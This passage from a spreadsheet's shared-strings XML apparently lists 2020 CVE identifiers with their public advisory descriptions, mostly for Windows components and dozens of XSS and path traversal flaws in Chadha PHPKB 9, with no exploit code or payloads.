  </si>
  <si>
    <t>An information disclosure vulnerability exists in the way that the Windows Server DHCP service improperly discloses the contents of its memory.To exploit the vulnerability, an unauthenticated attacker could send a specially crafted packet to an affected DHCP server, aka 'Windows DHCP Server Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-1032</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when Hyper-V RemoteFX vGPU on a host server fails to properly validate input from an authenticated user on a guest operating system, aka 'Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1036, CVE-2020-1040, CVE-2020-1041, CVE-2020-1042, CVE-2020-1043.</t>
  </si>
  <si>
    <t>CVE-2020-1033</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka 'Windows Kernel Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0928, CVE-2020-1589, CVE-2020-1592, CVE-2020-16854.</t>
  </si>
  <si>
    <t>CVE-2020-1034</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-1035</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka 'VBScript Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1058, CVE-2020-1060, CVE-2020-1093.</t>
  </si>
  <si>
    <t>CVE-2020-1036</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when Hyper-V RemoteFX vGPU on a host server fails to properly validate input from an authenticated user on a guest operating system, aka 'Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1032, CVE-2020-1040, CVE-2020-1041, CVE-2020-1042, CVE-2020-1043.</t>
  </si>
  <si>
    <t>CVE-2020-10364</t>
  </si>
  <si>
    <t>The SSH daemon on MikroTik routers through v6.44.3 could allow remote attackers to generate CPU activity, trigger refusal of new authorized connections, and cause a reboot via connect and write system calls, because of uncontrolled resource management.</t>
  </si>
  <si>
    <t>CVE-2020-10365</t>
  </si>
  <si>
    <t>LogicalDoc before 8.3.3 allows SQL Injection. LogicalDoc populates the list of available documents by querying the database. This list could be filtered by modifying some of the parameters. Some of them are not properly sanitized which could allow an authenticated attacker to perform arbitrary queries to the database.</t>
  </si>
  <si>
    <t>CVE-2020-10366</t>
  </si>
  <si>
    <t>LogicalDoc before 8.3.3 allows /servlet.gupld Directory Traversal, a different vulnerability than CVE-2020-9423 and CVE-2020-10365.</t>
  </si>
  <si>
    <t>CVE-2020-1037</t>
  </si>
  <si>
    <t>CVE-2020-10372</t>
  </si>
  <si>
    <t>Ramp AltitudeCDN Altimeter before 2.4.0 allows authenticated Stored XSS via the vdms/ipmapping.jsp location field to the dms/rest/services/datastore/createOrEditValueForKey URI.</t>
  </si>
  <si>
    <t>CVE-2020-10374</t>
  </si>
  <si>
    <t>A webserver component in Paessler PRTG Network Monitor 19.2.50 to PRTG 20.1.56 allows unauthenticated remote command execution via a crafted POST request or the what parameter of the screenshot function in the Contact Support form.</t>
  </si>
  <si>
    <t>CVE-2020-10375</t>
  </si>
  <si>
    <t>An issue was discovered in New Media Smarty before 9.10. Passwords are stored in the database in an obfuscated format that can be easily reversed. The file data.mdb contains these obfuscated passwords in the second column. NOTE: this is unrelated to the popular Smarty template engine product.</t>
  </si>
  <si>
    <t>CVE-2020-10376</t>
  </si>
  <si>
    <t>Technicolor TC7337NET 08.89.17.23.03 devices allow remote attackers to discover passwords by sniffing the network for an "Authorization: Basic" HTTP header.</t>
  </si>
  <si>
    <t>CVE-2020-10377</t>
  </si>
  <si>
    <t>A weak encryption vulnerability in Mitel MiVoice Connect Client before 214.100.1214.0 could allow an unauthenticated attacker to gain access to user credentials. A successful exploit could allow an attacker to access the system with compromised user credentials.</t>
  </si>
  <si>
    <t>CVE-2020-10378</t>
  </si>
  <si>
    <t>In libImaging/PcxDecode.c in Pillow before 7.1.0, an out-of-bounds read can occur when reading PCX files where state-&gt;shuffle is instructed to read beyond state-&gt;buffer.</t>
  </si>
  <si>
    <t>CVE-2020-10379</t>
  </si>
  <si>
    <t>In Pillow before 7.1.0, there are two Buffer Overflows in libImaging/TiffDecode.c.</t>
  </si>
  <si>
    <t>CVE-2020-1038</t>
  </si>
  <si>
    <t>A denial of service vulnerability exists when Windows Routing Utilities improperly handles objects in memory, aka 'Windows Routing Utilities Denial of Service'.</t>
  </si>
  <si>
    <t>exploits/php/webapps/48245.txt</t>
  </si>
  <si>
    <t>WordPress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting</t>
  </si>
  <si>
    <t>CVE-2020-10380</t>
  </si>
  <si>
    <t>RMySQL through 0.10.19 allows SQL Injection.</t>
  </si>
  <si>
    <t>CVE-2020-10381</t>
  </si>
  <si>
    <t>An issue was discovered in the MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 software in all versions through 2.5.0. There is an unauthenticated SQL injection in DATA24, allowing attackers to discover database and table names.</t>
  </si>
  <si>
    <t>CVE-2020-10382</t>
  </si>
  <si>
    <t>An issue was discovered in the MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 software in all versions through 2.5.0. There is an authenticated remote code execution in the backup-scheduler.</t>
  </si>
  <si>
    <t>CVE-2020-10383</t>
  </si>
  <si>
    <t>An issue was discovered in the MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 software in all versions through 2.5.0. There is an unauthenticated remote code execution in the com_mb24sysapi module.</t>
  </si>
  <si>
    <t>CVE-2020-10384</t>
  </si>
  <si>
    <t>An issue was discovered in the MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 software in all versions through 2.6.1. There is a local privilege escalation from the www-data account to the root account.</t>
  </si>
  <si>
    <t>CVE-2020-10385</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) vulnerability exists in the WPForms Contact Form (aka wpforms-lite) plugin before 1.5.9 for WordPress.</t>
  </si>
  <si>
    <t>CVE-2020-10386</t>
  </si>
  <si>
    <t>admin/imagepaster/image-upload.php in Chadha PHPKB Standard Multi-Language 9 allows remote attackers to achieve Code Execution by uploading a .php file in the admin/js/ directory.</t>
  </si>
  <si>
    <t>CVE-2020-10387</t>
  </si>
  <si>
    <t>Path Traversal in admin/download.php in Chadha PHPKB Standard Multi-Language 9 allows remote attackers to download files from the server using a dot-dot-slash sequence (../) via the GET parameter file.</t>
  </si>
  <si>
    <t>CVE-2020-10388</t>
  </si>
  <si>
    <t>The way the Referer header in article.php is handled in Chadha PHPKB Standard Multi-Language 9 allows attackers to execute Stored (Blind) XSS (injecting arbitrary web script or HTML) in admin/report-referrers.php (vulnerable file admin/include/functions-articles.php).</t>
  </si>
  <si>
    <t>CVE-2020-10389</t>
  </si>
  <si>
    <t>admin/save-settings.php in Chadha PHPKB Standard Multi-Language 9 allows remote attackers to achieve Code Execution by injecting PHP code into any POST parameter when saving global settings.</t>
  </si>
  <si>
    <t>CVE-2020-1039</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1074.</t>
  </si>
  <si>
    <t>CVE-2020-10390</t>
  </si>
  <si>
    <t>OS Command Injection in export.php (vulnerable function called from include/functions-article.php) in Chadha PHPKB Standard Multi-Language 9 allows remote attackers to achieve Code Execution by saving the code to be executed as the wkhtmltopdf path via admin/save-settings.php.</t>
  </si>
  <si>
    <t>CVE-2020-10391</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/add-article.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10392</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/add-category.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10393</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/add-field.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10394</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/add-glossary.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10395</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/add-group.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10396</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/add-language.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10397</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/add-news.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10398</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/add-template.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10399</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/add-user.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-1040</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when Hyper-V RemoteFX vGPU on a host server fails to properly validate input from an authenticated user on a guest operating system, aka 'Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1032, CVE-2020-1036, CVE-2020-1041, CVE-2020-1042, CVE-2020-1043.</t>
  </si>
  <si>
    <t>CVE-2020-10400</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/article-collaboration.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10401</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/edit-article.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10402</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/edit-category.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10403</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/edit-comment.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10404</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/edit-field.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10405</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/edit-glossary.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10406</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/edit-group.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10407</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/edit-news.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10408</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/edit-subscriber.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10409</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/edit-template.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-1041</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when Hyper-V RemoteFX vGPU on a host server fails to properly validate input from an authenticated user on a guest operating system, aka 'Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1032, CVE-2020-1036, CVE-2020-1040, CVE-2020-1042, CVE-2020-1043.</t>
  </si>
  <si>
    <t>CVE-2020-10410</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/edit-user.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10411</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/email-harvester.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10412</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/import-csv.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10413</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/import-html.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10414</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/index-attachments.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10415</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/index.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10416</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/kb-backup.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10417</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/manage-articles.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10418</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/manage-attachments.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10419</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/manage-categories.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-1042</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when Hyper-V RemoteFX vGPU on a host server fails to properly validate input from an authenticated user on a guest operating system, aka 'Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1032, CVE-2020-1036, CVE-2020-1040, CVE-2020-1041, CVE-2020-1043.</t>
  </si>
  <si>
    <t>CVE-2020-10420</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/manage-comments.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10421</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/manage-departments.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10422</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/manage-drafts.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10423</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/manage-feedbacks.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10424</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/manage-fields.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10425</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/manage-glossary.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10426</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/manage-groups.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10427</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/manage-languages.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10428</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/manage-news.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10429</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/manage-settings.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-1043</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when Hyper-V RemoteFX vGPU on a host server fails to properly validate input from an authenticated user on a guest operating system, aka 'Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1032, CVE-2020-1036, CVE-2020-1040, CVE-2020-1041, CVE-2020-1042.</t>
  </si>
  <si>
    <t>CVE-2020-10430</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/manage-subscribers.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10431</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/manage-templates.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10432</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/manage-tickets.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10433</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/manage-users.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10434</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/manage-versions.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10435</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/my-languages.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10436</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/my-profile.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10437</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/optimize-database.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10438</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/reply-ticket.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10439</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/report-article-discussed.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-1044</t>
  </si>
  <si>
    <t>A security feature bypass vulnerability exists in SQL Server Reporting Services (SSRS) when the server improperly validates attachments uploaded to reports, aka 'SQL Server Reporting Services Security Feature Bypass Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-10440</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/report-article-mailed.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10441</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/report-article-monthly.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10442</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/report-article-popular.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10443</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/report-article-printed.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10444</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/report-article-rated.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10445</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/report-article.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10446</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/report-category.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10447</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/report-failed-login.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10448</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/report-referrers.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10449</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/report-search.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-1045</t>
  </si>
  <si>
    <t>A security feature bypass vulnerability exists in the way Microsoft ASP.NET Core parses encoded cookie names.The ASP.NET Core cookie parser decodes entire cookie strings which could allow a malicious attacker to set a second cookie with the name being percent encoded.The security update addresses the vulnerability by fixing the way the ASP.NET Core cookie parser handles encoded names., aka 'Microsoft ASP.NET Core Security Feature Bypass Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-10450</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/report-traffic.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10451</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/report-user.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10452</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/save-article.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10453</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/search-users.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10454</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/sitemap-generator.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10455</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/translate.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10456</t>
  </si>
  <si>
    <t>The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/trash-box.php by adding a question mark (?) followed by the payload.</t>
  </si>
  <si>
    <t>CVE-2020-10457</t>
  </si>
  <si>
    <t>Path Traversal in admin/imagepaster/image-renaming.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to rename any file on the webserver using a dot-dot-slash sequence (../) via the POST parameter imgName (for the new name) and imgUrl (for the current file to be renamed).</t>
  </si>
  <si>
    <t>CVE-2020-10458</t>
  </si>
  <si>
    <t>Path Traversal in admin/imagepaster/operations.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to delete any folder on the webserver using a dot-dot-slash sequence (../) via the GET parameter crdir, when the GET parameter action is set to df, causing a Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2020-10459</t>
  </si>
  <si>
    <t>Path Traversal in admin/assetmanager/assetmanager.php (vulnerable function saved in admin/assetmanager/functions.php) in Chadha PHPKB Standard Multi-Language 9 allows attackers to list the files that are stored on the webserver using a dot-dot-slash sequence (../) via the POST parameter inpCurrFolder.</t>
  </si>
  <si>
    <t>CVE-2020-1046</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when Microsoft .NET Framework processes input, aka '.NET Framework Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-10460</t>
  </si>
  <si>
    <t>admin/include/operations.php (via admin/email-harvester.php) in Chadha PHPKB Standard Multi-Language 9 allows attackers to inject untrusted input inside CSV files via the POST parameter data.</t>
  </si>
  <si>
    <t>CVE-2020-10461</t>
  </si>
  <si>
    <t>The way comments in article.php (vulnerable function in include/functions-article.php) are handled in Chadha PHPKB Standard Multi-Language 9 allows attackers to execute Stored (Blind) XSS (injecting arbitrary web script or HTML) in admin/manage-comments.php, via the GET parameter cmt.</t>
  </si>
  <si>
    <t>CVE-2020-10462</t>
  </si>
  <si>
    <t>Reflected XSS in admin/edit-field.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to inject arbitrary web script or HTML via the GET parameter p.</t>
  </si>
  <si>
    <t>CVE-2020-10463</t>
  </si>
  <si>
    <t>Reflected XSS in admin/edit-template.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to inject arbitrary web script or HTML via the GET parameter p.</t>
  </si>
  <si>
    <t>CVE-2020-10464</t>
  </si>
  <si>
    <t>Reflected XSS in admin/edit-article.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to inject arbitrary web script or HTML via the GET parameter p.</t>
  </si>
  <si>
